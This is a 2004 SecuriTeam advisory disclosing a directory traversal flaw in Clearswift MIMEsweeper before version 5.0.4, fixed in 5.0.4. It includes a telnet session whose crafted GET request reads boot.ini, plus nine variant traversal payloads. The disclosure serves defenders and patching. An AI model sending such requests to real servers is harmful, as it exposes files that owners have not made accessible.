[NEWS] Clearswift MIMEsweeper Directory Traversal Vulnerability

• Previous message: SecuriTeam: "[EXPL] AIM aim:goaway URI Handler Buffer Overflow Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 15 Aug 2004 15:27:58 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Clearswift MIMEsweeper Directory Traversal Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://www.mimesweeper.com/products/msw/default.asp> MIMEsweeper is "a
family of products designed to implement email and web communications
e-policies. MIMEsweeper delivers the capabilities for organizations to
protect themselves against email and web based threats, meet legal and
regulatory requirements, implement productivity saving policies and manage
the intellectual property passing through their network".

A vulnerability in the product allows attackers to retrieve files that
would otherwise be inaccessible through a directory traversal
vulnerability.

DETAILS

Vulnerable Systems:
 * Clearswift MIMEsweeper versions prior to 5.0.4

Immune Systems:
 * Clearswift MIMEsweeper version 5.0.4 or newer

It is possible to read arbitrary files on the remote server by pre-pending
/foobar/\../\../ in front on the file name.

Example:
telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0

HTTP/1.0 200 Ok
Date: Do, 27 Jul 2004 14:30:07 GMT
Server: Clearswift Web Server
Content-length: 186
Content-type: application/octet-stream

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server"
/fastdetect
Connection closed by foreign host.

Here are some several examples:
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0

Impact:
This vulnerability can be used to retrieve any file from the portion where
the Clearswift web server is installed. The number of "/","\",".."
characters will depend on the ServerRoot (location of the virtual /
directory) setting.

Vendor Status:
Clearswift has fixed the vulnerability in version 5.0.4 or newer.

ADDITIONAL INFORMATION

The information has been provided by <mailto:kroma@syss.de> Pierre Kroma.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] AIM aim:goaway URI Handler Buffer Overflow Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]